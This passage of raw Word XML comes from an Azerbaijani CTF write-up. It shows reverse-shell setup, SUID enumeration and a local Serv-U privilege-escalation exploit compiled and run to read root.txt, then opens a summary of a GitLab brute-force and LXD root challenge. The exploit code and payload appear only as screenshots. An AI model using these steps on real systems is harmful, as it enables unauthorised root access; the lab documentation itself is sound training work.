      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="340" w:right="340"/>
        <w:shd w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>uname -a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="340" w:right="340"/>
        <w:shd w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>find / -perm -4000 -type f 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="2555507"/>
            <wp:docPr id="26" name="Picture 26"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Screenshot 2026-04-18 232427.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="2555507"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Netcat listener. Bu addım geri bağlantını qəbul etmək üçün lazımdır; listener olmadan reverse shell qurulmaz.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="1683503"/>
            <wp:docPr id="27" name="Picture 27"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Screenshot 2026-04-18 232451.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="1683503"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Reverse shell payload-ının göndərilməsi. Məqsəd Burp üzərindən bir dəfəlik RCE-ni davamlı shell-ə çevirmək idi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="596558"/>
            <wp:docPr id="28" name="Picture 28"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Screenshot 2026-04-18 232656.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="596558"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Shell daxilində whoami nəticəsi. Bu ekran artıq interaktiv shell-in qurulduğunu və kontekstin www-data olduğunu təsdiqləyir.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="437933"/>
            <wp:docPr id="29" name="Picture 29"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Screenshot 2026-04-18 232715.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="437933"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>id nəticəsi. Buradakı qrup və UID məlumatları privilege escalation istiqamətini müəyyən etməyə kömək edir.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="243064"/>
            <wp:docPr id="30" name="Picture 30"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Screenshot 2026-04-18 232817.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="243064"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Kernel və sistem versiyası. Bu məlumat lokal exploit və məhsul versiyası uyğunluğu üçün vacibdir.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="4094088"/>
            <wp:docPr id="31" name="Picture 31"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Screenshot 2026-04-18 233006.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId40"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="4094088"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SUID faylların enumerasiyası. Məqsəd qeyri-adi və istismar oluna bilən yüksəldilmiş icazəli binariləri tapmaq idi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="398642"/>
            <wp:docPr id="32" name="Picture 32"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Screenshot 2026-04-18 233307.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="398642"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/usr/local/Serv-U/Serv-U binarisinin SUID olduğu təsdiqlənir. Bu, standart sistemlərdə gözlənilməyən və yüksək risk yaradan tapıntıdır.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="1049020"/>
            <wp:docPr id="33" name="Picture 33"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Screenshot 2026-04-18 233708.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="1049020"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Serv-U startup logu və məhsul versiyası. Məhsulun dəqiq versiyasını bilmək uyğun exploit seçmək üçün vacibdir.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="163A63"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2.5 Serv-U üzərindən privilege escalation və root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Serv-U 15.1.6.25 üçün uyğun yerli exploit hazırlanıb compile edildi. Exploit işə salındıqda root shell açıldı, effective UID 0 təsdiq edildi və sonda root.txt oxunaraq challenge tamamlandı.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Niyə bu addım seçildi: SUID ilə işləyən Serv-U binarisi sistemdə ən güclü escalation namizədi idi. Məqsəd məlum zəiflik və ya səhv davranışdan istifadə edərək effective UID-ni root-a qaldırmaq idi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="340" w:right="340"/>
        <w:shd w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>gcc exploit.c -o exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="340" w:right="340"/>
        <w:shd w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>./exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="340" w:right="340"/>
        <w:shd w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="340" w:right="340"/>
        <w:shd w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cat /root/root.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="3805991"/>
            <wp:docPr id="34" name="Picture 34"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Screenshot 2026-04-18 233747.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId43"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="3805991"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>exploit.c mənbə kodu. Burada xüsusi SUID binarinin necə çağırılacağı və root shell necə əldə olunacağı göstərilir.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="304227"/>
            <wp:docPr id="35" name="Picture 35"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Screenshot 2026-04-18 233813.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId44"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="304227"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Exploit-in tərtib olunması. Məqsəd nəzəri zəifliyi işlək binariyə çevirmək idi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="1405959"/>
            <wp:docPr id="36" name="Picture 36"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Screenshot 2026-04-18 233934.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="1405959"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Exploit işə salındıqdan sonra root shell. Buradakı uid=0 nəticəsi escalation-ın uğurunu birbaşa sübut edir.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="5600482"/>
            <wp:docPr id="37" name="Picture 37"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Screenshot 2026-04-18 234021.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId46"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="5600482"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>root qovluğu / root.txt üzərində yekun sübut. Bu ekran challenge-in tam tamamlandığını göstərir.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="163A63"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>CTF 4</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4873"/>
        <w:gridCol w:w="4873"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Hədəf tipi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>GitLab + SSH + Linux host</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Aşkarlanan portlar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>22/ssh, 80/http, 443/https GitLab</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>İlkin giriş</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>GitLab istifadəçi enumerasiyası və brute force</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>İstifadəçi bayraqları</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>plumber hesabı altında user1.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Yekun imtiyaz</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>LXD qrupundan istifadə etməklə root</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="163A63"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3.1 GitLab səthinin ilkin analizi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
